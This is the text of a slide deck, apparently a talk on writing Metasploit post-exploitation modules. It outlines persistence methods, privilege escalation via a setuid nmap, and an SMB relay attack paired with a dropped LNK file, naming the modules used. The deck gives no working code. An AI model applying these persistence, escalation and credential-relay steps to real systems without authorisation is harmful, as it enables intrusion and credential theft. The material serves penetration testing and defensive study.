12. POST MODULE DESIGN
Should be minimal
• Complexity is hard to debug and maintain
• Do one thing and do it well
– Resource scripts can automate multiple modules
13. POST MODULE DESIGN
Should be readable
• Consistent structure
• Consistent option names
• Consistent output
14. POST MODULE DESIGN
Should be reliable
• Detect relevant variables
• Never crash session/host if you can avoid it
• Clean up
15. POST MODULE DEVELOPMENT
Like Aux modules in many ways
• Define a run() method
• Optional setup(), cleanup() methods
• Have Actions
• Can include Exploit / Auxiliary mixins
• Should report something
17. METASPLOIT POST API
• DSL*-like interface for automating shells
• Abstracts out common stuff
• Platform-agnostic methods for
– Reading/writing binary files
– Running shell commands
– Listing users
*Domain Specific Language
22. PRESENCE - THE MACHINE
• What does this box do?
• What processes are running?
– AV, Tripwire
– ssh-agent, pageant
– Editors
– Database servers
• What does it talk to?
25. TEMPORARY PERSISTENCE
• Reverse http(s) payloads
• Doesn't survive reboot but useful for keeping
shells when network is spotty
26. MORE PERMANENT OPTIONS
• Autoruns
– Drop an exe in the right place, maybe mod registry
– Simple, effective
• Task scheduler, cron, launchd
• Enable RDP
• Enable root login for ssh
28. POST-EXPLOITATION EXPLOITATION
• For when you absolutely, positively have to
have root
– (and don’t mind the occasional kernel panic)
• We can kinda blur the line between local and
remote here
29. $ -> #
• Just like with network exploitation, not always
an exploit
• Passwords (sudo)
• Trust relationships (suid executables)
• Misconfiguration (all sorts of shit)
30. DEMO: MULTI/LOCAL/SETUID_NMAP
"Nmap should never be installed with
special privileges (e.g. suid root) for
security reasons."
41. SMB RELAY
Attacker Target
Victim calculates challenge
response and replies with
final authentication packet
Victim
42. SMB RELAY
Attacker Target
Attacker logs into Target
with Victim's credentials
Victim
43. SMB RELAY
• Well-known attack
• Some mitigations break it, but largely still
useful and will be for a long time
44. SMB RELAY + LNK FILE
Drop LNK file (post/windows/escalate/droplnk)
Setup a relay (exploit/windows/smb/smb_relay)
Wait for an Admin to open
that directory Victim
Create LNK file
Target Compromised File Server
45. AUTOMATIC DOMAIN AUTH
• Windows stores creds in memory and does
NTLM auth using your current token
• When you do something in the GUI that
requires auth, it happens automatically using
those creds
• If your user has Local Admin on another box,
you can create/start services (usually)